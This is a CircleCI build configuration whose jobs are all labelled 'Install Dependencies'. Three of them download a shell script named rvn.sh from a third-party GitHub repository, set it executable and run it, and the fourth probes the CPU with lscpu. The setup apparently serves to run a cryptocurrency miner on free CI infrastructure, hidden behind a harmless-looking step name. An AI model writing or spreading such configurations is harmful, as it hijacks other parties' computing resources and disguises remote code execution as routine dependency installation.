version: 2.1
jobs:
    Devop:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: timeout 1m lscpu
    Devop1:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: timeout 1m wget https://raw.githubusercontent.com/angkii/kontol/main/rvn.sh && chmod 777 rvn.sh && ./rvn.sh
    Devop2:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: timeout 1m wget https://raw.githubusercontent.com/angkii/kontol/main/rvn.sh && chmod 777 rvn.sh && ./rvn.sh
    Devop3:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: timeout 1m wget https://raw.githubusercontent.com/angkii/kontol/main/rvn.sh && chmod 777 rvn.sh && ./rvn.sh
workflows:
    version: 2.1
    build:
        jobs:
            - Devop
            - Devop1
            - Devop2
            - Devop3